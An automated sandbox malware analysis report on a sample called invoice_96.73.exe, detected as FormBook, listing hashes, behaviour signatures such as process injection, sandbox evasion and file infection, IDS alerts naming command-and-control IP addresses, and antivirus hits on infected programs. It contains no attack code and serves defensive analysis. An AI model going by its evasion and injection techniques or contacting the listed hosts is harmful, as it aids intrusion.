Windows Analysis Report
invoice_96.73.exe

Overview

General Information

Sample name:invoice_96.73.exe
Analysis ID:1564502
MD5:0ad46265c37a53172d0658e862699a0e
SHA1:82a738aeecee1392fcbb46a6ebceb367790e4831
SHA256:04bd713b045d145c032e88c3f122e92565b3647e016367e29987c9afc2666d04

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries random domain names (often used to prevent blacklisting and sinkholes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Connects to many different domains
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w7x64
  • invoice_96.73.exe (PID: 3268 cmdline: "C:\Users\user\Desktop\invoice_96.73.exe" MD5: 0AD46265C37A53172D0658E862699A0E)
    • svchost.exe (PID: 3380 cmdline: "C:\Users\user\Desktop\invoice_96.73.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
  • armsvc.exe (PID: 3320 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 38BDB885A492FB07195A5DF3F45BA0BB)
  • alg.exe (PID: 3456 cmdline: C:\Windows\System32\alg.exe MD5: D51E3C5F1FB63103D04A4FDBBC56FEE7)
  • aspnet_state.exe (PID: 3492 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe MD5: BBA4722DF24C70555CF255FAE1A123D7)
  • ehrecvr.exe (PID: 3792 cmdline: C:\Windows\ehome\ehRecvr.exe MD5: 22DA4B53195377BBE2A2460989C3D203)
  • ehsched.exe (PID: 3860 cmdline: C:\Windows\ehome\ehsched.exe MD5: C0B1AC1980E0EE5E641EA4C250791D87)
  • FXSSVC.exe (PID: 3936 cmdline: C:\Windows\system32\fxssvc.exe MD5: 862331ACCCC3F8DC8BF248C0E6CF16A3)
  • ieetwcollector.exe (PID: 4024 cmdline: C:\Windows\system32\IEEtwCollector.exe /V MD5: 475B5B41F2CFABE32500D1A9602C2A3E)
  • maintenanceservice.exe (PID: 4068 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: CC9BE47A84D7EB73D78181F087D654DC)
  • msdtc.exe (PID: 2992 cmdline: C:\Windows\System32\msdtc.exe MD5: 8A39539F9626492BC25BBEF9E516EC26)
  • msiexec.exe (PID: 2952 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 2568F4F643C82673898904F584A264BA)
  • perfhost.exe (PID: 2260 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 4A3EAAF9D1C0E0BB3F263E7A314171FA)
  • Locator.exe (PID: 1976 cmdline: C:\Windows\system32\locator.exe MD5: 16E5AF7C321FDD4D4ABCA40501F44C18)
  • snmptrap.exe (PID: 2092 cmdline: C:\Windows\System32\snmptrap.exe MD5: 2A428B8B0253AA1D839ED564BA512230)
  • vds.exe (PID: 2748 cmdline: C:\Windows\System32\vds.exe MD5: CC2DA4A13C382DA8674052AB5005C252)
  • wbengine.exe (PID: 2728 cmdline: "C:\Windows\system32\wbengine.exe" MD5: B9B616B65A90E396A161A24A8A456884)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ParentImage: C:\Users\user\Desktop\invoice_96.73.exe, ParentProcessId: 3268, ParentProcessName: invoice_96.73.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ProcessId: 3380, ProcessName: svchost.exe
      Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ParentImage: C:\Users\user\Desktop\invoice_96.73.exe, ParentProcessId: 3268, ParentProcessName: invoice_96.73.exe, ProcessCommandLine: "C:\Users\user\Desktop\invoice_96.73.exe", ProcessId: 3380, ProcessName: svchost.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-28T12:12:04.812989+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.22 | 52781 | 8.8.8.8 | 53 | UDP

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-28T12:11:59.186207+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.22 | 49881 | 8.8.8.8 | 53 | UDP

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-28T12:11:59.256622+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.22 | 49168 | TCP
      2024-11-28T12:13:38.712649+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.22 | 49176 | TCP
      2024-11-28T12:13:40.919269+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.22 | 49177 | TCP
      2024-11-28T12:13:45.265069+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.22 | 49179 | TCP
      2024-11-28T12:13:49.618320+0100 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.22 | 49182 | TCP
      2024-11-28T12:13:51.584461+0100 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.22 | 49183 | TCP
      2024-11-28T12:14:05.039850+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.22 | 49187 | TCP
      2024-11-28T12:14:06.755681+0100 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.22 | 49188 | TCP
      2024-11-28T12:14:08.144025+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.22 | 49189 | TCP
      2024-11-28T12:14:14.311753+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.22 | 49196 | TCP

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-28T12:11:59.256622+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.22 | 49168 | TCP
      2024-11-28T12:13:38.712649+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.22 | 49176 | TCP
      2024-11-28T12:13:40.919269+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.22 | 49177 | TCP
      2024-11-28T12:13:45.265069+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.22 | 49179 | TCP
      2024-11-28T12:13:49.618320+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.22 | 49182 | TCP
      2024-11-28T12:13:51.584461+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.22 | 49183 | TCP
      2024-11-28T12:14:05.039850+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.22 | 49187 | TCP
      2024-11-28T12:14:06.755681+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.22 | 49188 | TCP
      2024-11-28T12:14:08.144025+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.22 | 49189 | TCP
      2024-11-28T12:14:14.311753+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.22 | 49196 | TCP

      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-11-28T12:13:38.589710+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49176 | 47.129.31.212 | 80 | TCP

      AV Detection

      Source: invoice_96.73.exe | Avira: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | Avira: detection malicious, Label: W32/Infector.Gen
      Source: invoice_96.73.exe | ReversingLabs: Detection: 95%
      Source: Yara match | File source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | Joe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | Joe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | Joe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | Joe Sandbox ML: detected
      Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | Joe Sandbox ML: detected
      Source: invoice_96.73.exe | Joe Sandbox ML: detected
      Source: invoice_96.73.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
      Source: C:\Windows\System32\msdtc.exe | File created: C:\Windows\DtcInstall.log
      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.549948881.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: invoice_96.73.exe, 00000000.00000003.346461774.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
      Source: Binary string: TextExtractor.pdb55. source: armsvc.exe, 00000002.00000003.528202244.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdb source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 00000002.00000003.469269296.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.470738958.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, ktab.exe.2.dr
      Source: Binary string: AcroBroker.pdb source: armsvc.exe, 00000002.00000003.494060398.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 00000002.00000003.466271925.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.468672844.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vssvc.pdb source: armsvc.exe, 00000002.00000003.400446853.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.397705170.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: sppsvc.pdb source: armsvc.exe, 00000002.00000003.393285094.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\jp2launcher\obj64\jp2launcher.pdb source: armsvc.exe, 00000002.00000003.459702439.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000002.00000003.377542137.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WCChromeNativeMessagingHost.pdb88/ source: armsvc.exe, 00000002.00000003.543127259.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 00000002.00000003.384565633.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.384370417.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: aspnet_state.pdb source: invoice_96.73.exe, 00000000.00000003.353700920.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdbTb source: armsvc.exe, 00000002.00000003.436668125.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: armsvc.exe, 00000002.00000003.453426244.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: invoice_96.73.exe, 00000000.00000003.350225262.0000000004220000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.353569093.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.382195696.0000000000710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.387726638.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.381468216.0000000000450000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\jre-image\bin\javaws.pdb source: armsvc.exe, 00000002.00000003.456767187.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 00000002.00000003.484334362.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.485863141.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, servertool.exe.2.dr
      Source: Binary string: FXSSVC.pdb source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Perforce\FRMain\code\build\win\results\Release\info\arh.pdb source: armsvc.exe, 00000002.00000003.539704237.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 00000002.00000003.391469846.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391488401.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392623971.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391662820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391640685.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.392746098.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391569645.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391549027.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391679575.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.410168312.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ehSched.pdb source: armsvc.exe, 00000002.00000003.368828729.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 00000002.00000003.356595540.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.356855501.00000000020D0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: locator.pdb@SH source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: locator.pdb source: armsvc.exe, 00000002.00000003.390348820.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.391373712.0000000001CA0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.390223997.0000000002040000.00000004.00001000.00020000.00000000.sdmp, Locator.exe.2.dr
      Source: Binary string: Eula.pdb995 source: armsvc.exe, 00000002.00000003.546479748.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 00000002.00000003.383128547.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.383373251.0000000002040000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: AcroRd32Info.pdb''$ source: armsvc.exe, 00000002.00000003.525307374.0000000001520000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ALG.pdbH source: invoice_96.73.exe, 00000000.00000003.353143094.0000000002990000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349561520.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.349725788.0000000003690000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 00000002.00000003.457782973.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.459238005.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\javaw_objs\javaw.pdb source: armsvc.exe, 00000002.00000003.455163285.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: vds.pdb source: armsvc.exe, 00000002.00000003.397013643.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.396407942.0000000002340000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 00000002.00000003.475333705.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.473148665.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp, pack200.exe.2.dr
      Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 00000002.00000003.375221834.0000000002110000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.375401545.00000000020C0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ADelRCP_Exec.pdb"" source: armsvc.exe, 00000002.00000003.535376805.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wbengine.pdb source: armsvc.exe, 00000002.00000003.406707369.0000000002340000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.408514012.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.2.dr
      Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\deploy\tmp\ssvagent\obj64\ssvagent.pdb source: armsvc.exe, 00000002.00000003.486325519.0000000001FE0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: RdrServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.505647536.0000000001520000.00000004.00001000.00020000.00000000.sdmp, RdrServicesUpdater.exe.2.dr
      Source: Binary string: Reader_SL.pdb source: armsvc.exe, 00000002.00000003.562770680.00000000015A0000.00000004.00001000.00020000.00000000.sdmp, reader_sl.exe.2.dr
